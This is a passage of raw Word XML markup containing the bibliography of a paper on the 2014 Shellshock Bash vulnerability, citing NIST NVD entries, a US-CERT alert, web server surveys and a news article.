          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerability Summary for CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E21C5" w:rsidRDefault="008E21C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E21C5" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7178.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Last accessed September 27, 2014, http://web.nvd.nist.gov/ view/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?vulnId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E21C5" w:rsidRDefault="008E21C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>6278.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E21C5" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">7. NIST. (September 24, 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>National Vulnerability Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerability Summary for CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E21C5" w:rsidRDefault="008E21C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008E21C5" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7186.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Last accessed September 27, 2014, http://web.nvd.nist.gov/ view/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?vulnId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E21C5" w:rsidRDefault="008E21C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7186.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B58F7" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">8. NIST. (September 24, 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>National Vulnerability Database</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerability Summary for CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B58F7" w:rsidRDefault="004B58F7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B58F7" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7187.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Last accessed September 27, 2014, http://web.nvd.nist.gov/ view/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>detail</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>?vulnId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=CVE-2014-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B58F7" w:rsidRDefault="004B58F7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>7187.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B58F7" w:rsidRPr="004B58F7" w:rsidRDefault="004B58F7">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9. US-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CERT  (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>25 September 2014), “Alert (TA14-268A), GNU Bourne-Again Shell (Bash) ‘Shellshock</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">’ </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277 and CVE 2014-6278)”.  </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink5"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>us-cert.gov</w:t>
        </w:r>
        <w:proofErr w:type="gramEnd"/>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="252525"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Last</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>revised: September 30, 2014</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10. W3Techs, (1 December 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“Usage of operating systems for websites”.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink5"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>w3techs.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retrieved 3 December 2014 </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://w3techs.com/technologies/overview/operating_system/all</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Body"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Netcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, (September 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“September 2014 Web Server Survey”.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink5"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>netcraft.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Retrieved 3 D</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cember 2014 </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://news.netcraft.com/archives/2014/09/24/september-2014-web-server-survey.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0021057A" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Jennifer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>LeClaire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1 October 2014). </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1 Billion Attacks Target Shellshock Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0021057A" w:rsidRDefault="0021057A">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>news</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004F7A5A">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="004F7A5A">
        <w:instrText xml:space="preserve"> HYPERLINK "http://factor.com" </w:instrText>
      </w:r>
      <w:r w:rsidR="004F7A5A">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rStyle w:val="Hyperlink5"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>factor.com</w:t>
      </w:r>
      <w:r w:rsidR="004F7A5A">
        <w:rPr>
          <w:rStyle w:val="Hyperlink5"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="0021057A">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
